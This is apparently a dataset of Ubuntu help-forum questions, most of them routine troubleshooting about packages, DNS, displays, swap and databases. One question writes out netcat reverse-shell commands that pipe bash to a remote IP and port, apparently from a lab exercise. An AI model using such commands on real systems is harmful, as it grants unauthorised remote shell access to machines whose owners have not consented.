n't find any package by regex 'libusb-1.0' e : unable to locate package libusb-0.1 e : could n't find any package by regex 'libusb-0.1' e : unable to locate package gtk2-engines-murrine
463458	how to remove a dns nameserver on ubuntu 14.04	so i just installed ubuntu 14.04 on my laptop . firefox has been incredibly slow , and i suspect my dns settings to be the issue . when i do a cat /run/resolvconf/resolv.conf here is what i get : nameserver 106.186.17.181 nameserver 118.88.20.195 nameserver 127.0.1.1 ( my router also has 106.186.17.181 and 118.88.20.195 for the dns . ) for troubleshooting purpose , i 'd like to remove the nameserver 127.0.1.1 , but can not figure out where/how to do that . if i do a search for it , here are the files where it appears : /etc/hosts:127.0.1.1 bidule /etc/resolv.conf : nameserver 127.0.1.1 where is this 127.0.1.1 getting generated from ? how can i remove it ? i do n't often tweak my settings , so excuse me if i am asking something that should be obvious . i did try to look for an answer online , but found nothing conclusive .
463459	update-alternatives path with arguments	i want to add a command to notepadd++ intallation using update-alternatives with wine command : sudo update-alternatives -- install /usr/bin/notepad notepad `` / < path_to_wine > /bin/wine c : \\program\ files\\notepad++\\notepad++.exe '' 100 but i get an error : update-alternatives : error : alternative path //bin/wine c : \program\ files\notepad++\notepad++.exe does n't exist is there a way to add program arguments to update-alternatives path parameter ? note : is my teamviewer wine installation : /opt/teamviewer9/tv_bin/wine/
463461	key input lag when typing	i have recently installed ubuntu 14.04 ( and before that i had the same problem with 12.04 ) on a dell inspiron 9400 intel core 2 duo t7200 . but when i am trying to type something the keys do sometimes not respond at all or the letter is repeated a lot in one short keystroke . for example : when typing `` hello '' this can happen : `` hlllllllllllllo '' the e in hello did not show up , and the second l repeated a couple of times . this did n't happen when i used a live usb boot . does somebody have the solution for my problem , because it makes the computer almost unusable . thanks in advance
463462	sequence of scripts sourced upon login	i would like to concentrate all my login config in my ~/.bash_profile . there was a ~/.bashrc there by default but i replaced it with a ~/.bash_profile . however , when i log in , something before my ~/.bash_profile gets sourced and displays the following : linux ubnt10-dev1 2.6.32-38-server # 83-ubuntu smp wed jan 4 11:26:59 utc 2012 x86_64 gnu/linux ubuntu 10.04.4 lts welcome to the ubuntu server ! * documentation : http : //www.ubuntu.com/server/doc system information as of fri may 9 12:17:39 edt 2014 system load : 0.01 processes : 74 usage of / : 5.5 % of 18.58gb users logged in : 0 memory usage : 4 % ip address for eth0 : 123.x.x.x swap usage : 0 % graph this data and manage this system at https : //landscape.canonical.com/ new release 'precise ' available . run 'do-release-upgrade ' to upgrade to it . last login : fri may 9 12:11:52 2014 from 123.x.x.x i would like to remove that so that only my own splash greeting defined in my ~/.bash_profile gets displays but i am not sure about the logic/sequence of scripts sourced/executed when a user logs in . can you enlighten me ? as a bonus , i would also like to know the sequence of automated sourcings/execs when the system starts , not just when a user starts a session by logging in , albeit this is a concern of lesser importance to me right now .
463468	creating a bash alias name that contains an =	i am trying to set up a ~/.bash_aliases that worked in 12.04 but now bash complains about the = sign . alias emacs = 'emacsclient -c -a -- socket-name=server -- alternate-editor=' how can i set this up ? what i am told : bash : alias : emacs : not found bash : alias : = : not found bash : alias : `emacsclient -c -a -- socket-name ' : invalid alias name if i type it in directly with no alias , it works and opens emacs
463473	packages 404 not found	i know there are many questions like this but this is not the same details . when i use sudo apt-get upgrade or sudo apt-get update command in terminal , this is what i get : w : failed to fetch http : //ppa.launchpad.net/apt-fast/stable/ubuntu/dists/trusty/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . dell @ dell-inspiron-1420 : ~ $ those are my only problems . please help me !
463480	white line in html5 player - google chrome	i have the latest version of ubuntu and the latest version of google chrome and when i go on youtube and watch a video ( 90 % of the time it is now htnl5 ) there is this annoying line at the top . does anyone know how to get rid of it ? here is a screenshot , you can see a white line at the very top . https : //drive.google.com/file/d/0b_8n167fpmvwug0tswzpc0zstkk/edit ? usp=sharing
463481	can not launch apps installed earlier in /opt	after the issue with login failure - ubuntu 14.04 i created new users with : sudo adduser < username > which successfully created the user . then i was able to login from lightdm . but the search applications tool can not find basic and installed apps like : terminal , google chrome , qbittorrent . what has gone wrong ? is it the drivers ? thanks karel - terminal opens with ctrl+alt+t micropenguin : sudo apt-get install unity-scope-home did not help . all my manually installed apps ( google chrome , maven , spring tool suite , mule studio . ) in /opt have gone bust . i had installed these earlier with another user having sudo rights . when i do a ls -al on any folder which contains the executable ( e.g . /opt/maven/bin ) , the terminal crashes . do you think it could be a virus ?
463482	icon size change	i 'm new to linux , about 2 weeks . i booted up this morning , and all my icons and associated fonts are miniscule , in all my programs . the layout for thunderbird is so small that i can hardly read the e-mail list . similarly the icons etc in firefox , etc . are really small . when i do open up emails , or open a web page on firefox , the font sizes are fine . i have tinkered with some settings , but nothing seems to work on the default settings . so , two questions : what has happened overnight , to change all my icon sizes ? how do i fix it ? here is the screenshot , but your suggestion of ubuntu tweak was a really good one , and seems to have fixed the problem thank you ! let 's try this : ! [ thunderbired screen shot ] [ 1 ] file : ///home/pat/desktop/screenshot % 20from % 202014-05-09 % 2011:43:47.png it says that i need a `` reputation 10 '' to post images , sorry !
463484	ca n't watch netflix using 14.04	i 'm using ubuntu 14.04 . i downloaded all the pipelight stuff and chrome to view netflix , but i still ca n't watch it . any tips please ? thanks !
463486	can no longer use screen share to connect mac to ubuntu since upgrading to 14.04	worked fine before , but since upgrading to ubuntu 14.04 lts , whilst the connection shows in finder ok when clicking on it says `` connection failed to âxxx 's remote desktop on xxxxxâ . the software on the remote computer appears to be incompatible with this version of screen sharing . '' desktop sharing preferences set to allow sharing and a password is requeted . everything else seems ok . anyone got any ideas ?
463488	screen unusable on 12.04 - inspirion m5010	my screen died ( unreadable content ) , i dont know why . tried to use an other screen but same problem there . i am running ubuntu 12.04 on a dell inspirion m5010 . image : http : //imgur.com/12ptjeg would appreciate some help . thank you !
463492	update ubuntu webapps to ubuntu 14.04	i made some unity webapps for ubuntu 13.04 and ubuntu 13.10 ( https : //github.com/eudennis/unity-webapps-tweetdeck , https : //github.com/eudennis/unity-webapps-feedly , https : //github.com/eudennis/unity-webapps-pocket , https : //github.com/eudennis/unity-webapps-evernote ) but they just stopped working with ubuntu 14.04 . i now that now it does n't integrate with the browser , but open on the `` ubuntu browser '' , but it just open a blank screen and i do n't know what happening . does the ubuntu browser have a console or something like that ? thanks !
463493	kvm nvidia passthrough	i 've seen a guide or two that seems to be replicated around on the internet on setting up kvm to use passthrough for nvidia . it seems to require 2 video cards . is it possible to do it with 1 video card ? i 'm trying to see if it 's possible to have a gaming machine setup so i do n't have to dual boot . is this possible ? i 've heard xen has a passthrough of their own , but nvidia does n't seem to support it on their desktop cards . i have a gtx 760 . is it possible to virtualize and get native or near-native performance good enough for modern game gaming ?
463496	php mysql connection works but no data can be displayed	i wrote this simple php script that just to import basic information from mysql table . as a result , not even a error message , but a blank screen . something to do with the php - mysql connection , but cant determine it since : apache2 is installed and is working ( 2.2.22 ) php and mysql are installed with php5-msql bundle ( last version 5.3.10 ) . phpmyadmin seems to work fine . furthermore , i tried to launch the pages with only the database connection and it seems to work , the only code line that makes the blank screen is `` while ( $ donnees = $ reponse- > fetch ( ) ) '' meaning that php can access the db but ca n't import data . do you have an idea of what is missing here ? thanks < p > voici le resultat de la verification : < ? php if ( $ _post [ 'password ' ] == `` xxxxxx '' ) { echo `` vous avez ete identifie avec le mot de passe '' . htmlspecialchars ( $ _post [ 'password ' ] ) ; } else { echo `` vous avez echoue '' ; } ? > < /p > < p > si tu veux retenter ta chance , < a href= '' password.php '' > clique ici < /a > < /p > < ? php try { //connexion à mysql $ bdd = new pdo ( 'mysql : host=localhost ; dbname=test ' , 'root ' , 'xxxxx ' ) ; } catch ( exception $ e ) { // exception pour erreur die ( 'erreur : ' . $ e- > getmessage ( ) ) ; } // si tout va bien récuperation de la table $ reponse = $ bdd- > query ( 'select * from billets ' ) ; // on affiche les entrees une à une while ( $ donnees = $ reponse- > fetch ( ) ) { ? > < p > < strong > livraison du contenu de chat < /strong > < ? php echo $ donnees [ 'titre ' ] ; ? > a laissé le message suivant < ? php echo $ donnees [ 'contenu ' ] ; ? > < /p > } < ? php $ reponse- > closecursor ( ) ; // termine le traitement ? >
463500	reverse shell to ubuntu returns input as output	i start a reverse shell session from an an ubuntu 12.04 server to my host 12.04 desktop . the specific actions i take can be seen here : how to open reverse shell from nowasp ? but in a nut-shell , i start the revert shell with by listening on my host , sudoo nc -l -k -v 10101. after that i go to the servers shell and enter /bin/nc 172.16.55.1 10101 /bin/bash or /bin/bash | nc 172.16.55.1 10101 both work . as i do this , a reverse shell opens but all i get is my input , if i type ls on the host side , i can see on the server side ls pops up , but i dont get the outpur i should for ls or any other command for that matter . any help would be welcome .
463502	camera keep changing it 's colors from light red to light green every 0.25 sec ( ubuntu 14.04 )	when i lunch cheese webcam booth this is what the picture looks like and it keeps changing between these 2 colors every 0.25 sec
463504	802.1x authentication not working on ubuntu 14.04	i am not able to connect to my ethernet ( via lan ) which requires 802.1x authentication ( tyoe peap ( mschapv2 ) ) on my ubuntu 14.04 in dell inspiron 14z . i had been able to connect in ubuntu 13.04 lts and on my windows 8 . plz help me . thanks
463506	lagging when swapping	i use ubuntu 14.04 on my lenovo e531 with 4gb installed . the problem is that when the ram is about 70 % full the system starts swapping . after swap is used ( even if only 10mb is in swap ) the system starts lagging and is absolutely unusable . after that i tried to empty the swap ( swapoff -a ) and it helped , but only for a while and then ubuntu again started lagging . i used only basic applications like chrome , thunderbird , pidgin , phpstorm , nothing more . i 've just run memtest to test the ram but it looks to be ok . please , could anybody give me an advice to solve my problem ? thanks .
463507	open minimized nautilus window and not open home in launcher	there is some behavior i ca n't understand in the unity desktop . open nautilus via . clicking in the launcher onto the home-button navigate to for example the windows-partition in nautilus minimize nautilus click on nautilus in the launcher does n't open the nautilus with windows-partition , instead it opens a new window with the home folder . is there a workaround for this strange behavior ? regards , arthur
463510	find users of swap when smem reports zero swap usage	i want to know , who and why uses my swap , but ca n't see swap users by smem . after setting sysctl vm.swappiness to 10 , and starting chromium ( 10 tabs ) , my swap usage jumps from 0 to 30-35 mb ( according to top and free ) . after closing the chromium swap usage do n't change , but after restarting it , additional 35 mb of swap is accounted as used . after some time swap usage grows to 131mb.. maybe it sounds like some kind of leak ? but sudo smem and sudo smem -u at every time report only zeroes as swap memory usages . the same information from smaps files from proc : # sudo cat /proc/ [ 0-9 ] */smaps|grep -i swap|uniq swap : 0 kb the swap usage is not from `` swapcached '' : sudo cat /proc/meminfo |grep -i swap : swapcached : 212 kb swaptotal : 16777212 kb swapfree : 16706048 kb how can i file which programs uses swap ? how kernel decide what to move into swap and what not to move ? how and when kernel removes not needed data from swap ? system : default ubuntu 14.04 x86_64 , 4 gb ram , 16 gb swap ( hdd ) .
463511	ubuntu touch app file type	hello i was wondering what type of app files you can upload to the ubuntu touch app store it is apk files ?
463517	no command 'rvm ' found , but there are 21 similar ones rvm : command not found	in my both of the terminal i was using happily rvm . now today , i unexpectedly seeing , in one terminal , rvm is not being recognize as a command , as it should be . but the other one is working perfectly . i did n't change anything as far as i know . could you help me to fix this ? in my ~/.bashrc file i can see - path= $ path : $ home/.rvm/bin # add rvm to path for scripting # # # added by the heroku toolbelt export path= '' /usr/local/heroku/bin : $ path '' update right side ( terminator ) showing ( ~ ) $ echo $ path /usr/local/heroku/bin : /home/kirti/bin : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games : /home/kirti/.rvm/gems/ruby-2.0.0-p0/bin/xmpfilter : /home/kirti/.rvm/bin ( ~ ) $ left side ( gnome ) showing ( arup~ > ~ ) $ echo $ path /home/kirti/bin : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games : /home/kirti/.rvm/gems/ruby-2.0.0-p0/bin/xmpfilter ( arup~ > ~ ) $
463521	update libreoffice 4.2.4 in ubuntu 14.04 lts trusty	libreoffice have update into minor release 4.2.4 . how to update them ? i have seen the package list in launchpad at libreoffice ppa , but it 's still not available until now ( still 4.2.3 rc3 ) .
463527	reinstalling ubuntu without files	i had a rather difficult problem with ubuntu which was preventing me from logging in so i decided to reinstall it.unfortunately , ubuntu only seems to allow me to `` reinstall '' . this installed all my files although the installation of previous programs failed.i then proceeded to boot up ubuntu and found that the problem persisted . my question is , is there way was i can merely install ubuntu without retaining my files ?
463529	applications launch on leftmost monitor in multi-monitor setup	for some reason applications decide to launch on my leftmost monitor ( which is my tv ) instead of my primary ( which is the monitor the the far right ) . it 's not all applications that have this behavior but a good portion of them . vlc and bluej for instance are applications that wo n't launch on my preferred monitor , they always launch on my leftmost monitor . i wo n't matter if i close them on the monitor i wishes to open them on . it also does n't matter if i run unity or gnome shell 3.10 , the problem persist on both . here is my xrandr output to give you an idea on how my monitors are positioned . i run an nvidia gefore 670 with the proprietary and tested version of the drivers , 331.38. xrandr screen 0 : minimum 8 x 8 , current 4480 x 1447 , maximum 16384 x 16384 dvi-i-0 connected 1280x1024+1280+423 ( normal left inverted right x axis y axis ) 340mm x 270mm 1280x1024 75.0*+ 60.0 1024x768 75.0 70.1 60.0 800x600 75.0 72.2 60.3 56.2 640x480 75.0 72.8 59.9 dvi-i-1 disconnected ( normal left inverted right x axis y axis ) hdmi-0 connected 1280x720+0+423 ( normal left inverted right x axis y axis ) 1434mm x 806mm 1280x720 50.0*+ 60.0 59.9 1920x1080 60.1 60.0 50.0 720x576 50.0 50.1 720x480 59.9 60.1 640x480 59.9 dp-0 connected primary 1920x1080+2560+0 ( normal left inverted right x axis y axis ) 531mm x 299mm 1920x1080 60.0*+ 59.9 50.0 60.1 60.0 50.0 1680x1050 60.0 1600x1200 60.0 1440x900 75.0 59.9 1280x1024 75.0 60.0 1280x960 60.0 1280x800 59.8 1280x720 60.0 59.9 50.0 1152x864 75.0 1024x768 75.0 70.1 60.0 800x600 75.0 72.2 60.3 56.2 720x576 50.0 720x480 59.9 640x480 75.0 72.8 59.9 dvi-d-0 disconnected ( normal left inverted right x axis y axis ) dp-1 disconnected ( normal left inverted right x axis y axis ) anyone who got an idea ? edit . i 've made a video to show the problem with the latest nvidia drivers 334.21 . still the same problem . youtube video
463530	huawei e5776s-32 myfi router can not connect with my ubuntu 14.04	i can not use huawei e5776s-32 on ubuntu 14.04 i followed all the tutorial i found on net but nothing helped so i 'm posting here with a hope that some expert will help me out of this situation . while trying to connect to my modem it shows unable to mount 4g myfi router .
463531	is it possible to get desktop notifications from irc chat room on empathy ?	i wan na receive the default desktop notifications using irc chat room in empathy . is there any plugin to do that ?
463532	installing ubuntu on windows xp without a disk	i have an older laptop with xp and want to install ubuntu on it , but my cd/dvd drive does not work . is there any other way to do this ?
463550	installing open corpus work bench	i tried to install the open corpus work bench cwb http : //cwb.sourceforge.net/ via the terminal . i followed the given instructions but terminal always answers `` command not found '' i use ubuntu 14.04 . can anybody help me please !
463551	terra terminal for ubuntu 14.04	i would like to try the terra terminal but the ppa does n't work for 14.04 . does terra support 14.04 ? if so , where can i find it ?
463552	how to add gufw to start up ?	want to know because i am tired of just clicking on the launcher because i just leave my laptop on . please help me . thank you pass does not apply when the program is activated
463553	partition mounts by `` mount '' command but not using the `` disks '' utility	i am facing a weird problem . i formatted a partition in my hard-drive with ext4 filesystem . when i mount it using the sudo mount /dev/sda9 /media/sda9/ command it mounts fine . however , when i use the `` disks '' utility to the same ( using the `` play '' button ) or to auto-mount the partition at startup ( using the `` disks '' utility ) i am unable to mount it . i get a error message saying the following : error mounting system-managed device /dev/sda9 : command-line `mount `` /mnt/ebb5724a-7341-461f-911f-7e733cdaefa4 '' ' exited with non-zero exit status 32 : mount : wrong fs type , bad option , bad superblock on /dev/sda9 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so as a result , i 'm getting error to mount the partition at startup . i 'm not sure what 's going wrong . can anyone please help ?
463555	software update got interruped 14.04 x64	getting error : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . can not install any new software . having the above error . tried running sudo dpkg -- configure -a.. it goes on for more than an hour and gets stuck and ram use goes to 95 % see below riken @ riken-ga-880gm-ud2h : ~ $ sudo dpkg -- configure -a [ sudo ] password for riken : setting up linux-image-3.13.0-24-generic ( 3.13.0-24.47 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) not updating initrd symbolic links since we are being updated/reinstalled ( 3.13.0-24.46 was configured last , according to dpkg ) not updating image symbolic links since we are being updated/reinstalled ( 3.13.0-24.46 was configured last , according to dpkg ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.13.0-24-generic /boot/vmlinuz-3.13.0-24-generic run-parts : executing /etc/kernel/postinst.d/dkms 3.13.0-24-generic /boot/vmlinuz-3.13.0-24-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.13.0-24-generic /boot/vmlinuz-3.13.0-24-generic update-initramfs : generating /boot/initrd.img-3.13.0-24-generic run-parts : executing /etc/kernel/postinst.d/pm-utils 3.13.0-24-generic /boot/vmlinuz-3.13.0-24-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.13.0-24-generic /boot/vmlinuz-3.13.0-24-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.13.0-24-generic /boot/vmlinuz-3.13.0-24-generic
463559	could not access file 'provider-state ' 401 unauthorized	error details : could not access file 'provider-state ' : gomaasapi : got error back from server : 401 unauthorized ( invalid signature . expected signature base string : & 2h7cnbqtvphftztqmftelpkqkqskk7ta ) after some work i got : error could not access 'provider state ' : gomaasapi : got error back from server : 401 unauthorized ( invalid consumer . ) in juju version 1.18.2-precise-i386
463562	unable to apt-get update , synaptic for apt and muon does not start , no way even using a terminal	i am pretty new using linux and use to mess up my system testing and trying . so , synaptic does not start as all i have to get packets and updates . here is error 's message i had ( english is n't my mother language , be kind with my level please ) e : erreur syntaxique /etc/apt/apt.conf.d/apt-file.conf:17â : valeur suivie de choses illicites translation from the french is : value followed by illicit things ! ! ooops what are illicit things ? i am not a bandit . i checked etc/apt/apt.conf.d , here is the file : # apt-file configuration file # substitutions are made as follows : # host = > remote hostname # port = > remote port # uri = > complete uri from sources.list # path = > path from / # dist = > the distribution name # cache = > path to the local cache dir # dest = > the destination file name inside the cache dir # cdrom = > cdrom mount point # where are located packages destination = < host > _ < path > _dists_ < dist > _contents- < arch > .gz # common code blocks can be defined as variables and be used as $ check_cmd , etc . later check_cmd = ( ( gunzip -l `` < cache > / < dest > _tmp '' > /dev/null 2 > & 1 || ( echo `` file is not gzipped . `` ; false ) ) & & mv `` < cache > / < dest > _tmp '' `` < cache > / < dest > '' 2 > & 1 ) error_cmd = ( rm -f `` < cache > / < dest > _tmp '' ; echo `` ca n't get < uri > /dists/ < dist > /contents- < arch > .gz '' ) post_dl_cmd = $ check_cmd || $ error_cmd # fetch methods using diffindex-download : # -i : ignore missing files # -q : be quiet # -n < num > : download full file if more than < num > patches would be necessary http = diffindex-download -i `` < uri > /dists/ < dist > /contents- < arch > .gz '' < cache > / < dest > https = diffindex-download -i `` < uri > /dists/ < dist > /contents- < arch > .gz '' < cache > / < dest > ftp = diffindex-download -i `` < uri > /dists/ < dist > /contents- < arch > .gz '' < cache > / < dest > # in debtorrent urls , we have to replace 'debtorrent ' by 'http ' , and we always download the full file debtorrent = diffindex-download -i -n 0 `` http : // < host > : < port|9988 > < path > /dists/ < dist > /contents- < arch > .gz '' < cache > / < dest > ssh = scp -p < port|22 > `` < user > @ < host > : / < path > /dists/ < dist > /contents- < arch > .gz '' `` < cache > / < dest > _tmp '' & & $ post_dl_cmd rsh = rcp -l < user > `` < host > : / < path > /dists/ < dist > /contents- < arch > .gz '' `` < cache > / < dest > _tmp '' & & $ post_dl_cmd file = cp `` / < path > /dists/ < dist > /contents- < arch > .gz '' `` < cache > / < dest > '' copy = cp `` / < path > /dists/ < dist > /contents- < arch > .gz '' `` < cache > / < dest > '' cdrom = echo `` put cdrom labeled < path > in the cdrom device and press [ enter ] '' > /dev/stderr ; read dummy ; mount `` < cdrom > '' ; cp `` < cdrom > /dists/ < dist > /contents- < arch > .gz '' `` < cache > / < dest > '' ; umount `` < cdrom > '' # schemes that might require user input on 'apt-file update' # these will be skipped if -n is given interactive = cdrom rsh ssh this is like chinese for me and as i made at least 10 re-instalations off my pc since using linux , but keep the faith , i wo n't modify this file alone . i did my best to found information and i found an explanation saying synaptic seems to overwritte in this file ( ? ? i do n't know ) which lead to a situation making update and upgrade impossible . here this link : http : //www.hyjoo.com/sujet-32191.html does somebody know what i am suffering off ?
463566	brightness control issue	brightness notification control is not working on ubuntu 14.04 . i searched over google if there is any method to fix it but i ca n't find nothing which is working or reliable . this is what i got from /sys/class/backlight/ acpi_video0 acpi_video1 intel_backlight radeon_bl1
463567	deja dup msg '' `` restore failed ''	three weeks ago i installed the upgrade from xubuntu 13.10 to 14.04 . the upgrade failed dramatically , and i wound up having to do a new install of tahr . when i tried to restore my last full deja dup backup i got the same error message i 've seen in so many of these postings , usually without any solution . i 've gone through everything i can find on how to extract the backup files ( including manually with worst case scenario ) . nothing has worked . i have re-installed deja dup 26 and 22 . still no luck . the closest i 've come to getting dd to restore the backup is by using gksu deja-dup-preferences . it seems to be working well , then a message appears : invalid data - sha1 hash mismatch for file : duplicity-full.20140419t161238z.vol1.difftar calculated hash : 71574d4b0e44833a7a8b74aa1fa088c8c3c66522 manifest hash : 093e12f8b6198e36f099bd2832d035ba9768178e i 've found one or two references to an identical problem in this forum , but the suggested solution ( using the touch command ) does n't work for me . does anyone know of a workaround for a hash mismatch ?
463571	can someone recommend a program to aid a butcher ?	new to linux and pretty much heavy computer usage . i was wondering , i 'm trying to come up with a program to aid in my job 's performance , i work as a butcher and was wondering how to program a data table that i can enter in items i have packaged , priced , and their respective `` sell by dates '' . thanks for the help ! i 'm running ubuntu 14.04 btw .
463572	detecting 404 somehow	i keep my pc running at home . sometimes , when i 'm at work , my pc ca n't load the pages that i want to load . i have to ssh to it , and reboot/restart browser . it 's really annoying and i 'm trying to find an easier way to do this . i thought about getting a screenshot and somehow try to check if it looks like a 404 page that i took screenshot before . but that may use my system resources a bit much . i tried to catch the title of the page with xdotool , but it fails . is there a way of detecting 404 pages ? i 'm using chromium-browser with ubuntu . those webpages are not accessible from my computer because of my internet connection/computer . the webpage is always on , but sometimes , because of connection problems , browser shows 404 with that tiny dinosaur . this is my xdotool code : # ! /usr/local/bin/xdotool a=`xdotool search `` http : //a.com is not available - chromium '' | head -1` if [ [ $ a ] ] ; then echo `` yes '' else echo `` nope '' fi
463575	frescobaldi midi player seems to be working fine but doesnt produce any sound	i 'm pretty new to ubuntu . i bought an acer aspire v5 laptop and installed ubuntu . so far everything worked in the way i want it , except frescobaldi . it 's an editor for lilypond files . there 's a midi-player included . i installed timidity and followed the instructions , however the midi player does n't produce any sound . there 's no error message or anything but it 's pretty clear that it does n't work . every other sound application worked fine so far and i am able to use the timidity midi player to play my midi-files . its just the built-in midi player in frescobaldi that doesnt work . how to solve this ? i googled it for hours now and there does n't seem to be anyone else with a similar problem .
463578	partition hdd for win6/64 installation using gparted	i am using 14.04/64 and wish to install win7/64 alongside . how can i partition a 1tb hdd for this using gparted ?
463579	after the first update ubuntu 12.04 lost wireless alltogether	after the first update the ubuntu 12.04 lost the wireless altogether . even i have lost enable wireless option display .
463581	installed dual boot ubuntu 14.04 and windows 8.1 ca n't boot into windows	i have two internal hard drives ; 1 for windows 8.1 and 1 for storage . i decided to install ubuntu on the secondary hard drive . one of the guides i used advised me to make a small boot partition in the free space as well , so i did . after my installation my computer defaults to the ubuntu partition and i can not boot to windows 8.1 . this is the error windows gives me : windows boot manager : file : \boot\bgd ( it may be bcd [ the picture i took with my phone is blurry ] ) status : 0xc000000f info : the book configuration data for your pc is missing or contains errors . what i 've tried : - first , yes i have been googling for an hour now - i tried to boot from my windows hard drive thinking that since i selected a bootloader on the secondary hard drive during installation . - the message also recommended i insert my installation disk and `` repair my computer '' i ran the programs and no luck . please , does anyone know how i could restore my windows partition ? ( at least have me get in so i can run easybcd . ) edit : i have just installed grub-customizer and the only options available to me are for ubuntu . could this possibly be because the windows bootloader is on the other hard driver ? gparted shows that it is still there .
463583	broken package ubuntu 12.04	this is the eror message i get but everything i try failed to resolve it : update manager the package system is broken . disable 3rd party repositories run in terminal apt-get install-f details : following packages have unmet dependencies linux-headers-generic-pae : depends : linux-headers-3.2.0-58-generic-pae but it is not installed how to solve this ?
463587	re-partition ubuntu installation	i installed ubuntu 14.04 from a cd-rom . i selected the option to install ubuntu along side windows . i did not understand the slider for the partition for the install , so i just took the default . i discovered that half the of the available disk space was reserved for a windows partition , and the remaining partition for ubuntu . how do i extend/re-install ubuntu to make use of that partition is reserved for windows ?
463588	how do not change owner and group when edit file in sublime text ?	i have file with owner www-data and group www-data . when i modified this file , it automatically change file owner to current user victor and group victor . can i modified foreign file without owner and group changes ? note : manually change file owner and group after edit does not fit note : i use sublime text 3 text editor for editing files
463589	kde flying bits animation - how do i stop this annoyance ?	when i close a dialog box , or interact with some ui controls , i get a flying rectangles animation where they start small near the site of my mouse cursor , then fly out toward the edge of the desktop , getting larger as they appear to come at me . i just want to turn it off , and live the rest of my life in quiet contemplation . can you help ? please do !
463592	lost the ability to login to unity	i installed the full kubuntu-desktop then removed kubuntu default greeter and then boom i ca n't find the list of desktops to choose from when logging into the system and had to login in to kubuntu each time . how can i restore my previous condition before that ?
463594	starting postgresql server , postgres user unknown	i am trying to start a postgresql server ( 9.3 ) on ubuntu 14.04 . i am following this standard tutorial : https : //help.ubuntu.com/community/postgresql after updating to from 13.10 to 14.04 i purged the postgresql installation because of a variety of difficulties i had inside pgadmin after the update . using this command after the fresh install : sudo -u postgres psql postgres returns : sudo : unknown user : postgres sudo : rule-plugin could not be initialized i could n't find any solution to this , but i have to admit i only use postgresql to house my gis-databases and i am pretty overwhelmed since encountering all these problems . edit : output of ls -la /var/lib/postgresql is `` ca n't access /var/lib/postgresql : file or directory not found '' ( translated from german ) edit 2 ( purged and reinstalled ) : paketlisten werden gelesen ... fertig abhängigkeitsbaum wird aufgebaut . statusinformationen werden eingelesen ... . fertig das folgende paket wurde automatisch installiert und wird nicht mehr benötigt : libossp-uuid16 verwenden sie »apt-get autoremove« , um es zu entfernen . vorgeschlagene pakete : oidentd ident-server locales-all die folgenden neuen pakete werden installiert : postgresql-9.3 0 aktualisiert , 1 neu installiert , 0 zu entfernen und 0 nicht aktualisiert . es müssen noch 0 b von 3.451 kb an archiven heruntergeladen werden . nach dieser operation werden 17,5 mb plattenplatz zusätzlich benutzt . vormals nicht ausgewähltes paket postgresql-9.3 wird gewählt . ( lese datenbank ... 457272 dateien und verzeichnisse sind derzeit installiert . ) vorbereitung zum entpacken von ... /postgresql-9.3_9.3.4-1.pgdg14.04+1_amd64.deb ... entpacken von postgresql-9.3 ( 9.3.4-1.pgdg14.04+1 ) ... trigger für postgresql-common ( 154.pgdg14.04+1 ) werden verarbeitet ... building postgresql dictionaries from installed myspell/hunspell packages ... de_at de_ch de_de en_au en_ca en_gb en_us en_za removing obsolete dictionary files : postgresql-9.3 ( 9.3.4-1.pgdg14.04+1 ) wird eingerichtet ... use of uninitialized value $ owneruid in getpwuid at /usr/bin/pg_createcluster line 277 . error : clusters must not be owned by root error : could not create default cluster . please create it manually with pg_createcluster 9.3 main -- start or a similar command ( see 'man pg_createcluster ' ) . update-alternatives : /usr/share/postgresql/9.3/man/man1/postmaster.1.gz wird verwendet , um /usr/share/man/man1/postmaster.1.gz ( postmaster.1.gz ) im auto-modus bereitzustellen * no postgresql clusters exist ; see `` man pg_createcluster ''
463597	migrating into a full ubuntu install	so i 've scoured a lot of different articles and i think i have a decent idea of what to do here but i 'm hoping someone will be willing to hold my hand a bit here . i 've been running 12.04 as a wubi install on my windows 7 box , and i 'm ready to bite the bullet and make the switch . i recently purchased a 120gb samsung 840 evo ssd to use as the boot/os drive , and will be changing my current primary hdd ( on which resides the windows 7 install and 12.04 wubi install ) to the secondary/data drive . main questions : can i install ubuntu onto the new drive easily from either within the windows or ubuntu environment or do i need to boot from cd/usb ? i understand that swapping to the ssd is bad , so i want to make sure if i keep swapping on or high swappiness that i 'm swapping to the hdd and not the ssd . how do i do this , and should i ? i 've seen a shell script for migrating an existing wubi install onto a new primary install , but i 'm not sure if this is good to use for an ssd or if i should start from scratch for any reason . any other sagely advice is greatly appreciated !
463599	no sound + flash speeded up after suspend	i 'm running 64 bit ubuntu 13.10 . i got the problem that sometimes if i resume from suspension state i got no sound anymore as well as all flash videos are very much sped up . this problem also occurs sometimes if i have the power cable plugged in and then pull it out ( sound goes away + flash sped up ) if i then plug it in again the problems dissappear . i noticed that many people had quite similar problems . using their solutions did not work for me so far . best regards
463601	problem with icon arrangement in the laucher	i 'm having a problem with selecting and arranging the icons in the launcher panel . i had the same problem in 13.10 . i hoped it would go away in 14.04 but unfortunately it has n't . first , when i right click items in the launcher , and select lock or unlock nothing happens . icons for closed programs do n't disappear , and when i try to lock apps to the launcher they do n't stay once they are closed . also , when i restart the computer none of the apps i 'unlocked ' went away . they are still there . also ( and maybe worse ... ) drag and drop rearrangement of the icons does n't work . when i try to drag and drop an app 's icon to a new position it does n't stay put . when i move the mouse away from the launcher i 'm unable to select anything at all , until i move the pointer back to the launcher and replace the icon in it 's old location . i 've tried restarting unity , but the same problems persist . any ideas ? thanks !
